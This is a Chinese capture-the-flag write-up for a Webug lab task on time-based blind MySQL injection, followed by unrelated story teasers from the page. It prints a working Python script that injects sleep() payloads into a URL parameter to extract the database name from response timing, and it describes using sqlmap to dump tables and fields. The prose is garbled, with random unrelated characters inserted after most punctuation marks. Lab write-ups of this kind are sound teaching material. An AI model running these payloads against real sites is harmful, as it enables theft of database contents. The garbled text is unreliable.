MySQL基于時間注入

    延時注入屬于盲注技術的一種柬讨,它是一種基于時間差異的注入技術。在某些網站屏蔽一般的MySQL注入時袍啡,可以通過這種方法所觀察所返回的時間來判斷是否存在注入點踩官。當存在符合一些條件的時候,就會執(zhí)行sleep()函數(shù)境输,延時sleep()函數(shù)內的參數(shù)秒后返回蔗牡,通過這個原理可以觀察語句執(zhí)行時間來判斷是否存在注入點。

這道題是Webug中的中級進階第5題嗅剖。


image.png

按照提示辩越,輸入在地址欄里輸入?type=看看什么情況:
image.png

百度了之后,參考大佬的信粮,輸入地址欄如下:


image.png

出現(xiàn)了這個頁面(后面測試了黔攒,好像就?type=1也可以出現(xiàn)這個頁面),證明應該存在注入點强缘。

查看了下注入的命令督惰,如果手動注入的話,得猜很久旅掂,參考了大佬的腳本:

import requests,time
payloads="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"
#存放跑出的結果
length=0
database=''
table=''
print('開始獲取長度')
for l in range(1,21):
    startTime1=time.time()
    url1="http://10.75.13.19/pentest/test/time/?type=1 and  if(length(database())=%d,sleep(3),3)"%(l)
    response1=requests.get(url1)
    if time.time()-startTime1>3:
        length=l;
        print('長度為:'+str(length))

print('開始查詢數(shù)據(jù)庫名字')
for d in range(1,length+1):
    for payload in payloads:
        startTime2=time.time()
        url2="http://10.75.13.19/pentest/test/time/?type=1 and  if(substr(database(),'%d',1)='%s',sleep(3),3)"%(d,payload)
        response2=requests.get(url2)#發(fā)送請求
        if time.time()-startTime2>3:  #判斷是否超過了3秒赏胚,從而是否函數(shù)sleep(3)
           database+=payload
           print(database)
           break
       
print('數(shù)據(jù)庫名為:'+database)
   

實現(xiàn)的語言為python。payloads的作用是用于匹配字符(應該用于猜解數(shù)據(jù)庫名字的字符)辞友。
url1實現(xiàn)的是猜解出數(shù)據(jù)庫名字的長度栅哀。url2實現(xiàn)的是猜解出數(shù)據(jù)庫的名字震肮。跑出的數(shù)據(jù)庫名字為:


image.png

用sqlmap工具對其進去查詢表,表中的字段留拾,數(shù)值等:

查詢表:


image.png

可得出表有:


image.png

接著查詢表中字段:
image.png

可以看出有 flag和id字段
再查字段:


image.png

就可以得到最后的flag了戳晌。
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市痴柔,隨后出現(xiàn)的幾起案子沦偎,更是在濱河造成了極大的恐慌,老刑警劉巖咳蔚,帶你破解...
    沈念sama閱讀 222,627評論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件豪嚎,死亡現(xiàn)場離奇詭異,居然都是意外死亡谈火,警方通過查閱死者的電腦和手機侈询,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,180評論 3 399
  • 文/潘曉璐 我一進店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來糯耍,“玉大人扔字,你說我怎么就攤上這事∥录迹” “怎么了革为?”我有些...
    開封第一講書人閱讀 169,346評論 0 362
  • 文/不壞的土叔 我叫張陵,是天一觀的道長舵鳞。 經常有香客問我震檩,道長,這世上最難降的妖魔是什么蜓堕? 我笑而不...
    開封第一講書人閱讀 60,097評論 1 300
  • 正文 為了忘掉前任抛虏,我火速辦了婚禮,結果婚禮上俩滥,老公的妹妹穿的比我還像新娘嘉蕾。我一直安慰自己,他們只是感情好霜旧,可當我...
    茶點故事閱讀 69,100評論 6 398
  • 文/花漫 我一把揭開白布错忱。 她就那樣靜靜地躺著,像睡著了一般挂据。 火紅的嫁衣襯著肌膚如雪以清。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,696評論 1 312
  • 那天崎逃,我揣著相機與錄音掷倔,去河邊找鬼。 笑死个绍,一個胖子當著我的面吹牛勒葱,可吹牛的內容都是我干的浪汪。 我是一名探鬼主播,決...
    沈念sama閱讀 41,165評論 3 422
  • 文/蒼蘭香墨 我猛地睜開眼凛虽,長吁一口氣:“原來是場噩夢啊……” “哼死遭!你這毒婦竟也來了?” 一聲冷哼從身側響起凯旋,我...
    開封第一講書人閱讀 40,108評論 0 277
  • 序言:老撾萬榮一對情侶失蹤呀潭,失蹤者是張志新(化名)和其女友劉穎,沒想到半個月后至非,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體钠署,經...
    沈念sama閱讀 46,646評論 1 319
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 38,709評論 3 342
  • 正文 我和宋清朗相戀三年荒椭,在試婚紗的時候發(fā)現(xiàn)自己被綠了谐鼎。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 40,861評論 1 353
  • 序言:一個原本活蹦亂跳的男人離奇死亡戳杀,死狀恐怖该面,靈堂內的尸體忽然破棺而出夭苗,到底是詐尸還是另有隱情信卡,我是刑警寧澤,帶...
    沈念sama閱讀 36,527評論 5 351
  • 正文 年R本政府宣布题造,位于F島的核電站傍菇,受9級特大地震影響,放射性物質發(fā)生泄漏界赔。R本人自食惡果不足惜丢习,卻給世界環(huán)境...
    茶點故事閱讀 42,196評論 3 336
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望淮悼。 院中可真熱鬧咐低,春花似錦搓幌、人聲如沸幕庐。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,698評論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽家肯。三九已至闷尿,卻和暖如春老充,著一層夾襖步出監(jiān)牢的瞬間列粪,已是汗流浹背福侈。 一陣腳步聲響...
    開封第一講書人閱讀 33,804評論 1 274
  • 我被黑心中介騙來泰國打工酒来, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人肪凛。 一個月前我還...
    沈念sama閱讀 49,287評論 3 379
  • 正文 我出身青樓堰汉,卻偏偏與公主長得像辽社,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子翘鸭,可洞房花燭夜當晚...
    茶點故事閱讀 45,860評論 2 361

推薦閱讀更多精彩內容

  • [SQL注入攻擊] SQL注入攻擊是黑客對數(shù)據(jù)庫進行攻擊的常用手段之一爹袁。隨著B/S模式應用開發(fā)的發(fā)展,使用這種模式...
    James黃杰閱讀 2,674評論 0 30
  • 姓名:于川皓 學號:16140210089 轉載自:https://baike.baidu.com/item/sq...
    道無涯_cc76閱讀 1,962評論 0 2
  • sqlmap也是滲透中常用的一個注入工具,其實在注入工具方面档址,一個sqlmap就足夠用了盹兢,只要你用的熟,秒殺各種工...
    linkally閱讀 6,904評論 1 40
  • sqlmap用戶手冊 說明:本文為轉載守伸,對原文中一些明顯的拼寫錯誤進行修正绎秒,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,056評論 0 5
  • 2019年5月16日 地點:三樓辦公室 對面桌的正戴著耳機看書 其他的兩位在玩 吃雞 我在做什么尼摹,想你啦 可我不能...
    零醬的世界閱讀 68評論 0 0